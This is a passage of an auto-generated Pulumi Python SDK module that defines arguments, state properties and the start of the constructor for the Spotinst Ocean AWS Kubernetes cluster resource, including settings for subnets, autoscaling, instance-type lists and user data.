@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
"""
return pulumi.get(self, "subnet_ids")
@subnet_ids.setter
def subnet_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "subnet_ids", value)
@property
@pulumi.getter(name="associatePublicIpAddress")
def associate_public_ip_address(self) -> Optional[pulumi.Input[bool]]:
"""
Configure public IP address allocation.
"""
return pulumi.get(self, "associate_public_ip_address")
@associate_public_ip_address.setter
def associate_public_ip_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "associate_public_ip_address", value)
@property
@pulumi.getter
def autoscaler(self) -> Optional[pulumi.Input['OceanAutoscalerArgs']]:
"""
Describes the Ocean Kubernetes Auto Scaler.
"""
return pulumi.get(self, "autoscaler")
@autoscaler.setter
def autoscaler(self, value: Optional[pulumi.Input['OceanAutoscalerArgs']]):
pulumi.set(self, "autoscaler", value)
@property
@pulumi.getter
def blacklists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
"""
return pulumi.get(self, "blacklists")
@blacklists.setter
def blacklists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "blacklists", value)
@property
@pulumi.getter(name="controllerId")
def controller_id(self) -> Optional[pulumi.Input[str]]:
"""
A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
"""
return pulumi.get(self, "controller_id")
@controller_id.setter
def controller_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "controller_id", value)
@property
@pulumi.getter(name="desiredCapacity")
def desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The number of instances to launch and maintain in the cluster.
"""
return pulumi.get(self, "desired_capacity")
@desired_capacity.setter
def desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "desired_capacity", value)
@property
@pulumi.getter(name="drainingTimeout")
def draining_timeout(self) -> Optional[pulumi.Input[int]]:
"""
The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
"""
return pulumi.get(self, "draining_timeout")
@draining_timeout.setter
def draining_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "draining_timeout", value)
@property
@pulumi.getter(name="ebsOptimized")
def ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
"""
return pulumi.get(self, "ebs_optimized")
@ebs_optimized.setter
def ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ebs_optimized", value)
@property
@pulumi.getter(name="fallbackToOndemand")
def fallback_to_ondemand(self) -> Optional[pulumi.Input[bool]]:
"""
If not Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
"""
return pulumi.get(self, "fallback_to_ondemand")
@fallback_to_ondemand.setter
def fallback_to_ondemand(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "fallback_to_ondemand", value)
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after the instance has launched to start checking its health.
"""
return pulumi.get(self, "grace_period")
@grace_period.setter
def grace_period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "grace_period", value)
@property
@pulumi.getter(name="iamInstanceProfile")
def iam_instance_profile(self) -> Optional[pulumi.Input[str]]:
"""
The instance profile iam role.
"""
return pulumi.get(self, "iam_instance_profile")
@iam_instance_profile.setter
def iam_instance_profile(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "iam_instance_profile", value)
@property
@pulumi.getter(name="imageId")
def image_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the image used to launch the instances.
"""
return pulumi.get(self, "image_id")
@image_id.setter
def image_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_id", value)
@property
@pulumi.getter(name="instanceMetadataOptions")
def instance_metadata_options(self) -> Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']]:
"""
Ocean instance metadata options object for IMDSv2.
"""
return pulumi.get(self, "instance_metadata_options")
@instance_metadata_options.setter
def instance_metadata_options(self, value: Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']]):
pulumi.set(self, "instance_metadata_options", value)
@property
@pulumi.getter(name="keyName")
def key_name(self) -> Optional[pulumi.Input[str]]:
"""
The key pair to attach the instances.
"""
return pulumi.get(self, "key_name")
@key_name.setter
def key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_name", value)
@property
@pulumi.getter(name="loadBalancers")
def load_balancers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]]:
"""
- Array of load balancer objects to add to ocean cluster
"""
return pulumi.get(self, "load_balancers")
@load_balancers.setter
def load_balancers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]]):
pulumi.set(self, "load_balancers", value)
@property
@pulumi.getter
def logging(self) -> Optional[pulumi.Input['OceanLoggingArgs']]:
"""
Logging configuration.
"""
return pulumi.get(self, "logging")
@logging.setter
def logging(self, value: Optional[pulumi.Input['OceanLoggingArgs']]):
pulumi.set(self, "logging", value)
@property
@pulumi.getter(name="maxSize")
def max_size(self) -> Optional[pulumi.Input[int]]:
"""
The upper limit of instances the cluster can scale up to.
"""
return pulumi.get(self, "max_size")
@max_size.setter
def max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_size", value)
@property
@pulumi.getter(name="minSize")
def min_size(self) -> Optional[pulumi.Input[int]]:
"""
The lower limit of instances the cluster can scale down to.
"""
return pulumi.get(self, "min_size")
@min_size.setter
def min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_size", value)
@property
@pulumi.getter
def monitoring(self) -> Optional[pulumi.Input[bool]]:
"""
Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
"""
return pulumi.get(self, "monitoring")
@monitoring.setter
def monitoring(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "monitoring", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Required if type is set to `CLASSIC`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region the cluster will run in.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="rootVolumeSize")
def root_volume_size(self) -> Optional[pulumi.Input[int]]:
"""
The size (in Gb) to allocate for the root volume. Minimum `20`.
"""
return pulumi.get(self, "root_volume_size")
@root_volume_size.setter
def root_volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "root_volume_size", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]]:
"""
Set scheduling object.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="spotPercentage")
def spot_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The percentage of Spot instances that would spin up from the `desired_capacity` number.
"""
return pulumi.get(self, "spot_percentage")
@spot_percentage.setter
def spot_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "spot_percentage", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]]:
"""
Optionally adds tags to instances launched in an Ocean cluster.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="updatePolicy")
def update_policy(self) -> Optional[pulumi.Input['OceanUpdatePolicyArgs']]:
return pulumi.get(self, "update_policy")
@update_policy.setter
def update_policy(self, value: Optional[pulumi.Input['OceanUpdatePolicyArgs']]):
pulumi.set(self, "update_policy", value)
@property
@pulumi.getter(name="useAsTemplateOnly")
def use_as_template_only(self) -> Optional[pulumi.Input[bool]]:
"""
launch specification defined on the Ocean object will function only as a template for virtual node groups.
When set to true, on Ocean resource creation please make sure your custom VNG has an initial_nodes parameter to create nodes for your VNG.
"""
return pulumi.get(self, "use_as_template_only")
@use_as_template_only.setter
def use_as_template_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_as_template_only", value)
@property
@pulumi.getter(name="userData")
def user_data(self) -> Optional[pulumi.Input[str]]:
"""
Base64-encoded MIME user data to make available to the instances.
"""
return pulumi.get(self, "user_data")
@user_data.setter
def user_data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_data", value)
@property
@pulumi.getter(name="utilizeCommitments")
def utilize_commitments(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "utilize_commitments")
@utilize_commitments.setter
def utilize_commitments(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "utilize_commitments", value)
@property
@pulumi.getter(name="utilizeReservedInstances")
def utilize_reserved_instances(self) -> Optional[pulumi.Input[bool]]:
"""
If Reserved instances exist, Ocean will utilize them before launching Spot instances.
"""
return pulumi.get(self, "utilize_reserved_instances")
@utilize_reserved_instances.setter
def utilize_reserved_instances(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "utilize_reserved_instances", value)
@property
@pulumi.getter
def whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
return pulumi.get(self, "whitelists")
@whitelists.setter
def whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "whitelists", value)
@pulumi.input_type
class _OceanState:
def __init__(__self__, *,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input['OceanAutoscalerArgs']] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]] = None,
logging: Optional[pulumi.Input['OceanLoggingArgs']] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]] = None,
security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]] = None,
update_policy: Optional[pulumi.Input['OceanUpdatePolicyArgs']] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Ocean resources.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input['OceanAutoscalerArgs'] autoscaler: Describes the Ocean Kubernetes Auto Scaler.
:param pulumi.Input[Sequence[pulumi.Input[str]]] blacklists: Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
:param pulumi.Input[str] controller_id: A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
:param pulumi.Input[int] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[int] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
:param pulumi.Input[bool] fallback_to_ondemand: If not Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
:param pulumi.Input[int] grace_period: The amount of time, in seconds, after the instance has launched to start checking its health.
:param pulumi.Input[str] iam_instance_profile: The instance profile iam role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input['OceanInstanceMetadataOptionsArgs'] instance_metadata_options: Ocean instance metadata options object for IMDSv2.
:param pulumi.Input[str] key_name: The key pair to attach the instances.
:param pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]] load_balancers: - Array of load balancer objects to add to ocean cluster
:param pulumi.Input['OceanLoggingArgs'] logging: Logging configuration.
:param pulumi.Input[int] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[int] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: Required if type is set to `CLASSIC`
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[int] root_volume_size: The size (in Gb) to allocate for the root volume. Minimum `20`.
:param pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]] scheduled_tasks: Set scheduling object.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_groups: One or more security group ids.
:param pulumi.Input[int] spot_percentage: The percentage of Spot instances that would spin up from the `desired_capacity` number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
:param pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[bool] use_as_template_only: launch specification defined on the Ocean object will function only as a template for virtual node groups.
When set to true, on Ocean resource creation please make sure your custom VNG has an initial_nodes parameter to create nodes for your VNG.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[bool] utilize_reserved_instances: If Reserved instances exist, Ocean will utilize them before launching Spot instances.
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelists: Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
if associate_public_ip_address is not None:
pulumi.set(__self__, "associate_public_ip_address", associate_public_ip_address)
if autoscaler is not None:
pulumi.set(__self__, "autoscaler", autoscaler)
if blacklists is not None:
pulumi.set(__self__, "blacklists", blacklists)
if controller_id is not None:
pulumi.set(__self__, "controller_id", controller_id)
if desired_capacity is not None:
pulumi.set(__self__, "desired_capacity", desired_capacity)
if draining_timeout is not None:
pulumi.set(__self__, "draining_timeout", draining_timeout)
if ebs_optimized is not None:
pulumi.set(__self__, "ebs_optimized", ebs_optimized)
if fallback_to_ondemand is not None:
pulumi.set(__self__, "fallback_to_ondemand", fallback_to_ondemand)
if grace_period is not None:
pulumi.set(__self__, "grace_period", grace_period)
if iam_instance_profile is not None:
pulumi.set(__self__, "iam_instance_profile", iam_instance_profile)
if image_id is not None:
pulumi.set(__self__, "image_id", image_id)
if instance_metadata_options is not None:
pulumi.set(__self__, "instance_metadata_options", instance_metadata_options)
if key_name is not None:
pulumi.set(__self__, "key_name", key_name)
if load_balancers is not None:
pulumi.set(__self__, "load_balancers", load_balancers)
if logging is not None:
pulumi.set(__self__, "logging", logging)
if max_size is not None:
pulumi.set(__self__, "max_size", max_size)
if min_size is not None:
pulumi.set(__self__, "min_size", min_size)
if monitoring is not None:
pulumi.set(__self__, "monitoring", monitoring)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
if root_volume_size is not None:
pulumi.set(__self__, "root_volume_size", root_volume_size)
if scheduled_tasks is not None:
pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
if security_groups is not None:
pulumi.set(__self__, "security_groups", security_groups)
if spot_percentage is not None:
pulumi.set(__self__, "spot_percentage", spot_percentage)
if subnet_ids is not None:
pulumi.set(__self__, "subnet_ids", subnet_ids)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if update_policy is not None:
pulumi.set(__self__, "update_policy", update_policy)
if use_as_template_only is not None:
pulumi.set(__self__, "use_as_template_only", use_as_template_only)
if user_data is not None:
pulumi.set(__self__, "user_data", user_data)
if utilize_commitments is not None:
pulumi.set(__self__, "utilize_commitments", utilize_commitments)
if utilize_reserved_instances is not None:
pulumi.set(__self__, "utilize_reserved_instances", utilize_reserved_instances)
if whitelists is not None:
pulumi.set(__self__, "whitelists", whitelists)
@property
@pulumi.getter(name="associatePublicIpAddress")
def associate_public_ip_address(self) -> Optional[pulumi.Input[bool]]:
"""
Configure public IP address allocation.
"""
return pulumi.get(self, "associate_public_ip_address")
@associate_public_ip_address.setter
def associate_public_ip_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "associate_public_ip_address", value)
@property
@pulumi.getter
def autoscaler(self) -> Optional[pulumi.Input['OceanAutoscalerArgs']]:
"""
Describes the Ocean Kubernetes Auto Scaler.
"""
return pulumi.get(self, "autoscaler")
@autoscaler.setter
def autoscaler(self, value: Optional[pulumi.Input['OceanAutoscalerArgs']]):
pulumi.set(self, "autoscaler", value)
@property
@pulumi.getter
def blacklists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
"""
return pulumi.get(self, "blacklists")
@blacklists.setter
def blacklists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "blacklists", value)
@property
@pulumi.getter(name="controllerId")
def controller_id(self) -> Optional[pulumi.Input[str]]:
"""
A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
"""
return pulumi.get(self, "controller_id")
@controller_id.setter
def controller_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "controller_id", value)
@property
@pulumi.getter(name="desiredCapacity")
def desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The number of instances to launch and maintain in the cluster.
"""
return pulumi.get(self, "desired_capacity")
@desired_capacity.setter
def desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "desired_capacity", value)
@property
@pulumi.getter(name="drainingTimeout")
def draining_timeout(self) -> Optional[pulumi.Input[int]]:
"""
The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
"""
return pulumi.get(self, "draining_timeout")
@draining_timeout.setter
def draining_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "draining_timeout", value)
@property
@pulumi.getter(name="ebsOptimized")
def ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
"""
return pulumi.get(self, "ebs_optimized")
@ebs_optimized.setter
def ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ebs_optimized", value)
@property
@pulumi.getter(name="fallbackToOndemand")
def fallback_to_ondemand(self) -> Optional[pulumi.Input[bool]]:
"""
If not Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
"""
return pulumi.get(self, "fallback_to_ondemand")
@fallback_to_ondemand.setter
def fallback_to_ondemand(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "fallback_to_ondemand", value)
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after the instance has launched to start checking its health.
"""
return pulumi.get(self, "grace_period")
@grace_period.setter
def grace_period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "grace_period", value)
@property
@pulumi.getter(name="iamInstanceProfile")
def iam_instance_profile(self) -> Optional[pulumi.Input[str]]:
"""
The instance profile iam role.
"""
return pulumi.get(self, "iam_instance_profile")
@iam_instance_profile.setter
def iam_instance_profile(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "iam_instance_profile", value)
@property
@pulumi.getter(name="imageId")
def image_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the image used to launch the instances.
"""
return pulumi.get(self, "image_id")
@image_id.setter
def image_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_id", value)
@property
@pulumi.getter(name="instanceMetadataOptions")
def instance_metadata_options(self) -> Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']]:
"""
Ocean instance metadata options object for IMDSv2.
"""
return pulumi.get(self, "instance_metadata_options")
@instance_metadata_options.setter
def instance_metadata_options(self, value: Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']]):
pulumi.set(self, "instance_metadata_options", value)
@property
@pulumi.getter(name="keyName")
def key_name(self) -> Optional[pulumi.Input[str]]:
"""
The key pair to attach the instances.
"""
return pulumi.get(self, "key_name")
@key_name.setter
def key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_name", value)
@property
@pulumi.getter(name="loadBalancers")
def load_balancers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]]:
"""
- Array of load balancer objects to add to ocean cluster
"""
return pulumi.get(self, "load_balancers")
@load_balancers.setter
def load_balancers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]]):
pulumi.set(self, "load_balancers", value)
@property
@pulumi.getter
def logging(self) -> Optional[pulumi.Input['OceanLoggingArgs']]:
"""
Logging configuration.
"""
return pulumi.get(self, "logging")
@logging.setter
def logging(self, value: Optional[pulumi.Input['OceanLoggingArgs']]):
pulumi.set(self, "logging", value)
@property
@pulumi.getter(name="maxSize")
def max_size(self) -> Optional[pulumi.Input[int]]:
"""
The upper limit of instances the cluster can scale up to.
"""
return pulumi.get(self, "max_size")
@max_size.setter
def max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_size", value)
@property
@pulumi.getter(name="minSize")
def min_size(self) -> Optional[pulumi.Input[int]]:
"""
The lower limit of instances the cluster can scale down to.
"""
return pulumi.get(self, "min_size")
@min_size.setter
def min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_size", value)
@property
@pulumi.getter
def monitoring(self) -> Optional[pulumi.Input[bool]]:
"""
Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
"""
return pulumi.get(self, "monitoring")
@monitoring.setter
def monitoring(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "monitoring", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Required if type is set to `CLASSIC`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region the cluster will run in.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="rootVolumeSize")
def root_volume_size(self) -> Optional[pulumi.Input[int]]:
"""
The size (in Gb) to allocate for the root volume. Minimum `20`.
"""
return pulumi.get(self, "root_volume_size")
@root_volume_size.setter
def root_volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "root_volume_size", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]]:
"""
Set scheduling object.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
One or more security group ids.
"""
return pulumi.get(self, "security_groups")
@security_groups.setter
def security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_groups", value)
@property
@pulumi.getter(name="spotPercentage")
def spot_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The percentage of Spot instances that would spin up from the `desired_capacity` number.
"""
return pulumi.get(self, "spot_percentage")
@spot_percentage.setter
def spot_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "spot_percentage", value)
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
"""
return pulumi.get(self, "subnet_ids")
@subnet_ids.setter
def subnet_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "subnet_ids", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]]:
"""
Optionally adds tags to instances launched in an Ocean cluster.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="updatePolicy")
def update_policy(self) -> Optional[pulumi.Input['OceanUpdatePolicyArgs']]:
return pulumi.get(self, "update_policy")
@update_policy.setter
def update_policy(self, value: Optional[pulumi.Input['OceanUpdatePolicyArgs']]):
pulumi.set(self, "update_policy", value)
@property
@pulumi.getter(name="useAsTemplateOnly")
def use_as_template_only(self) -> Optional[pulumi.Input[bool]]:
"""
launch specification defined on the Ocean object will function only as a template for virtual node groups.
When set to true, on Ocean resource creation please make sure your custom VNG has an initial_nodes parameter to create nodes for your VNG.
"""
return pulumi.get(self, "use_as_template_only")
@use_as_template_only.setter
def use_as_template_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_as_template_only", value)
@property
@pulumi.getter(name="userData")
def user_data(self) -> Optional[pulumi.Input[str]]:
"""
Base64-encoded MIME user data to make available to the instances.
"""
return pulumi.get(self, "user_data")
@user_data.setter
def user_data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_data", value)
@property
@pulumi.getter(name="utilizeCommitments")
def utilize_commitments(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "utilize_commitments")
@utilize_commitments.setter
def utilize_commitments(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "utilize_commitments", value)
@property
@pulumi.getter(name="utilizeReservedInstances")
def utilize_reserved_instances(self) -> Optional[pulumi.Input[bool]]:
"""
If Reserved instances exist, Ocean will utilize them before launching Spot instances.
"""
return pulumi.get(self, "utilize_reserved_instances")
@utilize_reserved_instances.setter
def utilize_reserved_instances(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "utilize_reserved_instances", value)
@property
@pulumi.getter
def whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
return pulumi.get(self, "whitelists")
@whitelists.setter
def whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "whitelists", value)
class Ocean(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']]] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']]] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]]] = None,
logging: Optional[pulumi.Input[pulumi.InputType['OceanLoggingArgs']]] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
